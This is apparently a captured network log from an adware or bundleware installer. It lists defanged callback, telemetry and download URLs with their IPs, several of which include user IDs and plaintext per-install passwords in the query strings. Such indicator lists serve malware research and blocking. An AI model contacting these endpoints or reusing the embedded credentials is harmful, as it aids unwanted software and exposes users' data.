hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=yhrBLBbZM9WBOuidoZFbtbi3muUffR3jbLi6w5qijh6RoZJTpqsyZxASc9FSZWyoGYsEX4kIHlu/0mFZouDnPiqbL3WeaiLbzTMGWLRHpW9oALKR6u0dIX8SRNladdM9bXKriifhG9zxHHFV7tnwhkh7wLZ3uox395lwett3Vo8TmouIR1qWdOQVEwIWRZI9Fm3Cnw66ZdG2RhXEGFhSlFdklJzkcUqd3Ih1Kfu IMReuT yH/uLbphiW/DYdUZuL1XwldYyi6o6OPzltHHEh4SKAFSm7JN4Dvl1Ie0NYsXYWYJZ2G1R01VmUCJgsNE AYCsljvoJNwjLw3VULpGjCmtL90K5JhMVO wnJbdjPvjIThxN S9EwTxchauHrQ9hdXWs9gHCsWrLZx3iqhAOXSh4 HSf3cXZ8qiEfUAdAvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpbY7 yLWB4 IfJKZ4NCKSCQ== 54.197.238.106
hxxp://online.goobzo.com/online/RegisterAnon.aspx?ProductID=12000&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList= 212.143.22.213
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHofaoyXCfoQIRgpbKKs6jK/sEUd/BCBLE 1KakB36ssAyR0VhWfLz7rzCOqouSiOX3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ORm1WAVEoCJveNGyFHqLUA65EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WAZARP6Tt9fppq73FZdDH/8= 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHY6 CMJNDnNYID5x5YtLWQpafL9ybUqF lhUgcG7ZBvd4qRXJPYOz 4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJrw5bx1Bs6wXxOai4hHWpZ05BUTAhZFkj0WbcKfDrpl0bZGFcQYWFKUSuSWw6fC38LH/jy8G4FGJY4SiD403Los 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBiYH9jylicula50u3XyigpVREcH6lvzpS2WA5XhQ4MoPBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dxdnyqIR9QB0C 0KTRCdY9hVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSltjv7ItYHj4h8kpng0IpIJ 54.197.238.106
hxxp://online.goobzo.com/online/ka.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1 212.143.22.213
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/23897.ashx?e=eFCD8T/coic9XN4SPQf2Kb0oSfJOuBg0GQ4V4xrYFdGMDmRWpWBZ0CAvELRpepitjKjHf0fty0gsvrWM 2Yqs9Bw8Rdr2x14WLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywrNszNzik7HYYan0yy1LdwNMNN2yVHejOL6tCIMfiHdwKfYKVrkrVWnbBj2Ssp4jBy/hL8rqZ RaEgBvOe8 r0j4iLYktDM5v7nxXe0AmaeN09x0h yMmOq3 e5cYLWVDvEq1XCmEIT/KGwMMc0gnpNgExseWQzn2EHlpLL4kVIWUA34Da4rs8pwDWkqZSAv0i25pRZR6JHzgVcutEhWpOrXQRmzE/i2sQiRCxg82CBKUlB7S/EMsTMOx0OlDq0ZhTTU5KUBl3bgXlhsdczfSpiH1EtZyDzNKKMNxASrgwDn7bkIpAd/AwKA674hIgU4SmGToIH l9ITqOPsxHSJawXmrqqB9Yk vVG uGW/201wXQoWr5s837YbjT59hL5SVIrBJal7EUG/thxvMPh 11xtP 5Dt uVAXFcDLfDqVwZcuANcCrE0bQlaRw3jzKcV1uZZ5Oema28ZtojFZJ2cKyTWOYHEqf5 2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvk= 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/23897.ashx?e=yhrBLBbZM9VPNjxRBLtb449we4XQqEV6/WD6e6SZIIHeyzV7AofXlhYwsCIys4jFl9RbU5Ar lzRpqP4OGTzK Lt6BhzfOsDBXnWkuh5LzaUfdGpw3nUglF9z0WypnnGstnhkcefCVXiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvfwqbgkyABd 198.232.124.192
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=yhrBLBbZM9WBOuidoZFbtbi3muUffR3jbLi6w5qijh6RoZJTpqsyZxASc9FSZWyoGYsEX4kIHlu/0mFZouDnPiqbL3WeaiLbzTMGWLRHpW9oALKR6u0dIfc/boITtVwp1P9gDFCZ6VapvGDt BB/ci1dbz JN6x9xuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJegMBsN/V/kj ukMkugzkCYw3hkUtKZ53m3WJytHC0lJh BoO5y99Rgk9gttj5ejpEBSr28YVyfPg8SfsOq8sVv 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBq2mie6K97bhs4164GCUCrHY6 CMJNDnNVJ80QsygdrlOPofYEioTNmxiezSykY/Z9jP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb582wDWK7EtoEv86gftLd19X1D9868HonIj9NWOW5Z1BfUQsLxVIQuRwafNiz7i UXVi33qPwefc AZSpRiXLg4A== 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=1ZEnpGuz/ISSsSz5Gin3VuSrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBpQ6ZdlmdsYCbUPmaXNWlX6cOBv59w3XV3YMennWKpognh1HGq AP1KrMrg41l/Ly7CST5Ycto3cE6nMAQ0x67lxVrNxtz1yEbBRuaRLHbXnTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub67iSCXfI0 nk7xKwR3W9AY9/CpuCTIAF0= 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=2v0SNuZrMFxLlRAfuGRpD SrE0ez3DjNcHIVErz6Mm0icvsFwQStENB87jgWTbK//EmjUQkbJhG95MROQWA/L1KaGmSCdQV0JzE2fNbpSI8fHQ7qf2qHBiYH9jylicula50u3XyigpVREcH6lvzpS5NOnjhl29VMiawHEBbFjHDiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvDlvHUGzrBfE5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpRK5JbDp8Lfwsf PLwbgUYljhKIPjTcuiw= 54.197.238.106
hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=e59a543c-07c1-4575-b0a1-b17d7cfac7a7&Password=l6G2E4Yn&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&ElapsedTime=1429400137&SBPIDS=1&KA=1 212.143.22.213
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16669.ashx?e=jJl6mEdycnT9yuFJumnxsuANBqv06shdQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 10JaJBDQDq3Vjr4IQgU6/17ym41MswgnBQC drCF7eFFzHXlUtGqMqmmPbJsgFofFl ZpF4nZVVUpoaZIJ1BXTib 8lcO8XYbxKtVwphCE/yhsDDHNIJ6TYBMbHlkM59hB5aSy JFSFlAN A2uK7PJ3084beqL2NWFfpRyppAnpqp9Xc7DttajYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW T5OeSwUDdvavnoSbOw/pQBUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKaddObvDIFYW 198.232.124.192
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPL0oSfJOuBg0J7P3DAC8IMDZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw3scS/rum0dyUP gGlRflyueXXE4oNm6FfjcbTVOKlb2yahRH8NI3UnOryRtAxgTc80Ki/Lj0aHEBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dxdnyqIR9QB0C 0KTRCdY9hVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmc1BIhQjgGNR8kpng0IpIJ 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=s5Ydxb c7o0asVMAMALcPL0oSfJOuBg0J7P3DAC8IMDZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw3scS/rum0dyUP gGlRflyueXXE4oNm6FfjcbTVOKlb2t5UU9B7DBN2oXYru/dbHg/eJIUUI29KJua/YhbaaQtbhLKDJ7gHH44roFtpr/bY5GbVYBUSgIm940bIUeotQDrkRgG1RponZW17SH9ileexTK6LFIjgpsLAf6b7pWvtYj3YOinLgXsemrvcVl0Mf/w== 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=blUJ6JGwk9K9KEnyTrgYNCez9wwAvCDA2YTeaOaZJPFysSIQM/WMqjEsdSRpTTrrTnlytR4CrxDFFm1YMIsTVnEsGevyxMGS6aTHa8D6ZsN7HEv67ptHclD/oBpUX5crnl1xOKDZuhXrGiiXWYz3NvgrB1VZh8CMsYns0spGP2fYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW fNsA1iuxLaBL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkcGnzYs 4vlFyjca/6c/zCZgGUqUYly4OA= 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=s0jsdppK9OufZNC1TqAoBD8Ciqt5ctYfTEgCpOx0T0GQL2F0hg1RiTdGGPs8AIHkGuSf5ccJqhPvYQ7YSDf5fSyjQRapHyYcv34ni8kUorZmnaU FLUhgrONeuBglAqxQKd0GEgkaflVZ4RT0d23GHcO0aQLqLvPZ1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAmMGUjfC0lQ4bieN4dwMAiQCgrTWge9c5pV1IGllrHIPLxQ3i9AquwzS5r6mtOURHi5n nh6YVLffopz0y2Q7Y 54.197.238.106
hxxp://online.goobzo.com/online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=0&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=0&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&ElapsedTime=1429400138&SBPIDS=1 212.143.22.213
hxxp://theswiftrecord.com/fp?alpha=J3csDhl8ezg9DQ4BAyQWJjN/AxknKzp/WAB2bRFFIGMhDl8lBl58ASI2QnlIZmQoXRQ6BTMPLyYADCYLP1Mje21PdmZmGnEjOR0PAiNXAwZkdi9CRzBve3ocWRksTAwiI20aHXcNJXF1IDAwFUt9ZCFaZiYJQghGOnF9UBlwYQ4DCTQyP1BKay48G0gPZ1wxCzdsOlYXIXpwYhlZCSpJGCMvYB8bYgx5aHMnJTcBWHpiOQ00N1UWGglmfB0KUHd8CUZ/LSA9SkEpd2VcFQ40Shx/EX14HRE8cHlzGFEfLk4TcGUsFXsrVXgnMGYlRF0eLj99DidJTUEFWD92f2gZZ2cJWmI7cmhjGwIuPBZEUn4ofR9gayJCRzh1fm8eJB0sSwwgJQZpaAZWGRk2WiUI
hxxp://theswiftrecord.com/ii?alpha=KnR0DWR/LWxbB0J/WydrKzAnAGQqKHglaR9HYBwheCg+SiE/BRc8U35yeGlgJT0zDA5zRE9NX2J/J1FzKj8ICQxFfigTY34oYwwnDzcPIjcHKy8cOXkgNzIzUWhyOX8vV1kbfHoJcgoXLEdrfygHEwVcBVtxbw0gNXpRVHUnIh5QVElyIFdveShjDS9WcBxibnZqc1k4PXU3JTEKaDQQdXVwYFs9IEohbV59YBpJahBvcFgGKhwTDSY2bCRXdy0gHlpHGwppQm8eS3RXchI9QjZrDzEsCGd7Mj1hYlgHJBY8OnprXTQ9BQkiWWppK1RjMnIWAUZ+XV1MNjFiRRMteXRLTksbKGdNcgU4ck5kFDdbPDh4YmJaJj1vJndkXQo1GjpqfHtOcT9ZJyAaIiZpFTVgPTIESXRVF3p4YS58Eio/OW1TSwAjYgEBP3kmXXJPYlwla2x+LF54MTg3ICJRE3ZTeSwnPkYwcgh0cQ8oPG0NP3QQe1oYIAYfGWZpJignI3NiXRtGGytoHBYFRxx5JwIrXzBrHBsdIkkqJWV8AiFdJw0tMDVOZiYuSiFrbHF0LE5kKnISSHtZYWMfUm8xfkEGemdRXkdSNm0cdC52MQUwQD4PYl5qU00GX20=
hxxp://theswiftrecord.com/if?alpha=KnR0DWQ1TAl4TBt7WydrKzAnAGQqKHglaR9HYBwheCg+SiE/BRc8U35yeGlgJT0zDA5zRE9NX2J/J1FzKj8ICQxFfigTY34oYwwnDzcPIjcHKy8cOXkgNzIzUWhyOX8vV1kbfHoJcgoXLEdrfygHEwVcBVtxbw0gNXpRVHUnIh5YQUkVbkQ+J1E8UXUtLV4/BS8xNg9gKixnfGBKXHtNeC0gNhtlYQl8ZQgpM2gKMWA2JA5qaF0XVnN+MnkOMHo3XFhENjRpd296KHwIL192AmN4aW53XjkqJnQuGANJeyobOnprXyg/XXkcU3ZiN0x2anJ3XAV4W14ZeXU0cBN/UnhbT00HKWBVchxxPFxuETcSZHYIKi0KbX8yeC46DUZmMWg8Y31ZIiZXKmsAODB2CitxZHFZCGlXWEl/ZSc1ESN8ehgHAkVoNgc9OHQzVmZbAVw0OjErKkwgWS94NTEIChULKWhwawJ3IU55fxx2NCgGfGAzN1URKh4bDyQgL3Rcci8rDQ0YQXA8ExBxKmICNVNiQjwyZR4jAHtpZ3UuOQIXAjEXUlQ+Tz4iW3kPeUdIGR1hMm8XJV97QE8TNlAPYgAwejFuVFAAM2dNchg4AXtSL2R2OiUzeAYJfmUidEkjCw9qV2E=
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_fail&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=swiftrecord&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=2&index_in_screen=1&index_in_session=2&0.7535562975350745
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action1=xa.geoip&action2=visit&action3=smt.visit.istartsurf&update1=ref,smt&update2=identifier,installer&update3=version,6.6.86.1606&update4=nation,us&update5=language,en 65.255.35.143
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=obiBp3WOda WjDTOqhvSEb0oSfJOuBg0ZkAbtSTrnD/ZhN5o5pkk8XKxIhAz9YyqMSx1JGlNOutOeXK1HgKvEMUWbVgwixNWcSwZ6/LEwZLppMdrwPpmw4FF6f/a06pCWjwfqp7MHxGpMWXGXOfhUiXwmSZn9bL3CkMpf9re0fn3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22ORm1WAVEoCJveNGyFHqLUA65EYBtUaaJ2Vte0h/YpXnsUyuixSI4KbCwH m 6Vr7WDk4k9vngPPGpq73FZdDH/8= 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=fx25sIC5hWOfZNC1TqAoBLUntwt5bxURTEgCpOx0T0GQL2F0hg1RiTdGGPs8AIHkGuSf5ccJqhPvYQ7YSDf5fSyjQRapHyYcv34ni8kUorY0A75TMG4v BbKdUb4fSU3inFskWrXAmXG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8l6AwGw39X SP66QyS6DOQJjDeGRS0pnnebdYnK0cLSUmH4Gg7nL31GCT2C22Pl6Okd10EwQxdzjoDxJ w6ryxW8= 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=c0XmKevqA0n9yuFJumnxsiS DXErth A 0R MP RL3VKgFoRkIu6RpNh8S9i4d0Hnb22gmYS8RsDllQ9J4QRpkb2k6Rn898YXCSgtUXqN5/aaUzToxOfiz0mbos5SmUuL1RonSUM0G8HF9ed47qLJdLkq GrncHeyXBDP8Ld0 yRF51HAH62ECVvD8H/vspbe9//dIyd3GGG7NLJhlXAptjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Bjt6DgsNnxOwUbmkSx2157mT/v0ajD3y 54.197.238.106
hxxp://d3hm9b8fv0d908.cloudfront.net/infv5/index/3428/bnd 54.230.46.102
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/12767.ashx?e=KC46TpkJIZzYLhsRuGeUab0oSfJOuBg0zZ0dT4XGkSyMDmRWpWBZ0CAvELRpepitjKjHf0fty0hJGuFgMSoJbK8eDQ9tcq3xb GEwPiedNJfOKWYd4uGNAB/MXM5vy8Es IILilpWF0R fXJinWV7npoW8o/g6d5g577mTPDhZg2zg/uCXuilVRRLF D02Bl4td6Rt2cx8sFsK7/Ya3qp3H4CQmKwMH4mSX0slVqEAn3iSFFCNvSibmv2IW2mkLW4Sygye4Bx OK6Bbaa/22OWbU/CGmJ5Yn 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/10870.ashx?e=NEjPoAxksx39yuFJumnxsjn4eNYQ9SOWQF3UKsSdb2t7HO4WybUyR1UeQGsGyqMalvCEtd9tAC4n5kT0ibNwlGAqR2XPWVGhv0BJaho5/afQlB3kfGAhd7KfjViNnCJbBPFyFq4etD2F1daz2AcKxastnHeKqEA5dKHj74dJ/dwoDd7hh3KMfQ== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/10870.ashx?e=NEjPoAxksx39yuFJumnxsjn4eNYQ9SOWQF3UKsSdb2t7HO4WybUyR1UeQGsGyqMalvCEtd9tAC4n5kT0ibNwlGAqR2XPWVGh jCDsw4o/xYUAvnawhe3hVdVxGgZRPVfMXFTku JRco heK0xfXkQRxc81u2rgCm44UuTa3qd5D7MusukiOxFesStD0GefRodseikVg j 96 SYftL70trCPXfs0VGOutK1wir 9nJN2uJXiY94Hd9BsUJC/kEr0V2YT/J4lJ7qLkJa1saxG4d9O68WmdWuUkHZX2hYJHhrZua0qaNRZzqVyeEjxCyoP0GbKHsMThLvzP8wrMbNKWJGXO0HAFwG1R7Qc7lJh uHebZZiKi64b1faQyCq7DrsmXNtOW7Zday9rCVSgOD pjAKNPoaDrBh6/v/Hm2KcpYHy1S9Ab35kZ/TvhUEvA3 3MoS/fu50NJ4btJZyNF/hC 3M747DWtv9NO1ldFnCjFnWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYMiISMf8I5JK 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/23897.ashx?e=043Mckb8LnjKYf/qJ5z9H SrE0ez3DjNuopI4Wttb4L8ln8Iap23//2TEkHeJNDUga zuhV9q9ERMPla97RNIRpykxVoGyBaz3HjAX5f3Ms/caEgn1aywnSpt9GSHWXQjyJC8MAmcYofyqeYLIru/skFM nYXmDEL4yGuSrT3L/4y49ULAFDJkrHAqyIeDNmDqZm84mZltXkERNHBe5a3/5OmEDwJ/nJy0n5cCJyqEpnWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYMiISMf8I5JK 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16634.ashx?e=PcwT4QFtuPBwlKCj/kNh870oSfJOuBg0zZ0dT4XGkSyMDmRWpWBZ0CAvELRpepitjKjHf0fty0jaP8uCRyw5tKzZqKuvEwKkWLazpewXw1jSN3ZRr1JhaATxIUcsgQ w24gBuBZeJveENvzEMy06jHr1mKZNfZywrNszNzik7HYYan0yy1LdwNMNN2yVHejOoCpRmhVhpio8u6Yg5dyBwLrN0DyGmXtUSf/buJgAiMrml2XdXjKhJm0LdlReY2/iE4Rn18L003uz0Lu2aZ4hDhQmP15je1GaTsjjJ8mc3T1bCKEZtK5kNYTUdhyOmg8ojMH Sx5lZQUBVKMMLvbAAl / nQs3MyUlkcwNkLwyotprHUkJgNhsSKxc5Do0zQJ2wETeChqRo2NpoLFcIffYuKqXv8VBC8EfKsBoA VW3YJtcVV8eOM1J2ERIpcBp2X3ENvTctwS0p96kHpWYXdJ76MImHBnaSt3UshJMp43cJyR1O2m34IkWxkA58Tiwe594khRQjb0om5r9iFtppC1uEsoMnuAcfjiugW2mv9tjlm1PwhpieWJw== 198.232.124.192
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/16634.ashx?e=PcwT4QFtuPBwlKCj/kNh870oSfJOuBg0zZ0dT4XGkSyMDmRWpWBZ0CAvELRpepitjKjHf0fty0jaP8uCRyw5tKzZqKuvEwKkWLazpewXw1g ltfx41nMghQC drCF7eFTvYhKMprBayhLBQe2rbTMasyuDjWX8vLsJJPlhy2jdwTqcwBDTHruRy5x0Up4A3P 198.232.124.192
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=KSz5qzb2KgLn7OfBI/VPcf3K4Um6afGye03i94NAiM/7RH4w/5EvdUqAWhGQi7pGk2HxL2Lh3QcuaAaDgF1REpvc5fUfFrFJRvaTpGfz3xhcJKC1Reo3n9ppTNOjE5 LPSZuizlKZS4vVGidJQzQbwcX153juosl0uSr4audwd7JcEM/wt3T7JEXnUcAfrYQJW8Pwf ylt73/90jJ3cYYbs0smGVcCm2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvkGO3oOCw2fE7BRuaRLHbXnuZP /RqMPfI= 54.197.238.106
hxxp://d3hnlp5dtgb93r.cloudfront.net/pinger?event_type=install_start&installer_source=tokyo-bidl&software_type=sponsored&muid=ad2252ce007468623bd139b0adec3423&client_uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&uniqid=false&affiliate_id=thetetrisgame&software_id=thetetrisgameezsg&sponsored_id=istartsurf&tokyo_csrf2_key=b39c3df4d922c0104a63a45167645ac7&tokyo_csrf2_timestamp=1429400111&slot_number=3&index_in_screen=1&index_in_session=3&0.4544383880033461
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=lOCrbsNL2zVPNjxRBLtb46Du3SqXTq58t8f6YpiR28IQ9XpMu3JNONKN/VUSdNXb6lcFzkAHUgF82tgewNDgDyZMAOD3mcq6qIs V7Ds6CRuZZIi5/tojmg8l4itKbh/HiBn688lkcr8toCm18jzwzsvB25MJtnS1urDxSq54gttr9SYvZpGaeXM3AOyMolLPBrSiXJp6zDwzjuB3V4QuM0FiFjdakeNbnZd8xqzln9nWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYJHseVKQaMUz7BRPf4VdiaQvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykprwLn5Ljfu1FSnkSnlVgA Q== 54.197.238.106
hxxp://dlrkbt247pbk6.cloudfront.net/3428_3b67a5ef5d450c1556c543c6323981d9/1.pak 54.192.46.211
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=eFCD8T/coiezrE/yDXLQyeSrE0ez3DjNAMrIyXaDBdMicvsFwQStECv5F5wArPI/YCpHZc9ZUaG4NIBMq aAlALMEicbqKjXqIs V7Ds6CRuZZIi5/tojmg8l4itKbh/HiBn688lkcr8toCm18jzwzsvB25MJtnS1urDxSq54gttr9SYvZpGaeXM3AOyMolLPBrSiXJp6zDwzjuB3V4QuM0FiFjdakeNbnZd8xqzln9nWpr61EGbEgSa6Z efd4uyZD6A1psf2ya3UsgcT0aYJHseVKQaMUz7BRPf4VdiaQvtCk0QnWPYVQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykprwLn5Ljfu1FSnkSnlVgA Q== 54.197.238.106
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=PcwT4QFtuPClUB4b/muCJQ2omNS/TGQz62ls PLHCLDT03ZwnpMmri4u 59fITlqw48A36x6z/KZIUDDHMapm6716HWP7Hb1hjZ3jwf MfnewapHV13X4PiY0VDEtXdazBaKXaEKdzFwqwK4Z/LB/gEuwwpt2SWXC/H/dL1Z3VIip4wN1YzN4vCUkFiosfAG2KwI4GpE9wLRXIwnBzB2/3N4YHUtLPnXNp0Ch2ZhfpvG4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8lyiuy5/oVLbn9609pFHvExuwUbmkSx21501BK/ ntU4rG62wGX5XNu/pZ/pzprFy4hjGhmacv1G uLVTO15bsS9eEKXCI1fi6Q== 54.197.238.106
hxxp://xa.xingcloud.com/v4/sof-installer/267123711_198339_B48A115F?action=smt.dlzip1.istartsurf.finish,2 65.255.35.143
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=2v0SNuZrMFyw0RTUGALXSri3muUffR3jCQhr67P8VPFdOfUh X e3BUkrLg5U13m1q9vWxoWV9 zo7anpTgKufSzmM3HEufAEaBiShDKRIV XTIrvDDxtKzNSYNJd9iFfUP3zrweiciP01Y5blnUF9RCwvFUhC5HFk/V3QGvA4nPCU8GQVxGgK2dgS8O/TaQhbdsE06OTTBOUDdMBQAxomYsAOzz7hm2v6mMnRFV9GixawDbyZHa2BnoeadAD6fPeMf9TfgZ9Z/Hbpte9Qm WpuhwwxJ7NKL3Uy0disUqxnYz9UHnTAf3Mvwero5ya7SNHyd9Jj1gdzCfQagY8pW fxWwjEc sn2rSyXRG2F38ORoUV4ogQDN0 5Fc7QwHLSVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSkUbHW6V7MJAtE He3GIrx8 54.197.238.106
hxxp://pn61ajqijj0-g48pastf.netdna-ssl.com/10870.ashx?e= 0m13SthQpv9yuFJumnxstsI3CMRjvhxQF3UKsSdb2t7HO4WybUyR1UeQGsGyqMalvCEtd9tAC56VMsYWoITeGAqR2XPWVGhYJpucY5gZaQiNxS6innVfUKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFMKnOuU1A3b8B8JOn8ja2rlfdNbrt4cE5zCONStn omRT/rv 3Ugl9NjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5 198.232.124.192
hxxp://rep.youtubeaccelerator.com/app/ping.ashx?e=/k6kR j50trrVVBzJuBn8v3K4Um6afGyBlfbAaYx2ELdEMPgzYwqeWQ14on7GBy10Z2od4/JytiUTOMPdFXY/7OjtqelOAq59LOYzccS58ARoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkcWT9XdAa8Dic8JTwZBXEaArZ2BLw79NpCFt2wTTo5NME5QN0wFADGiZiwA7PPuGba/qYydEVX0aLFrANvJkdrYGeh5p0APp894x/1N Bn1n8dum171Cb5am6HDDEns0ovdTLR2KxSrGdjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5/FbCMRz6yfatLJdEbYXfw5GhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKRRsdbpXswkChr98/SR9nrM= 54.197.238.106
hxxp://log.very911.com/install.gif?bundle=istartsurf&ptid=smt&uid=267123711_198339_B48A115F 184.173.191.224
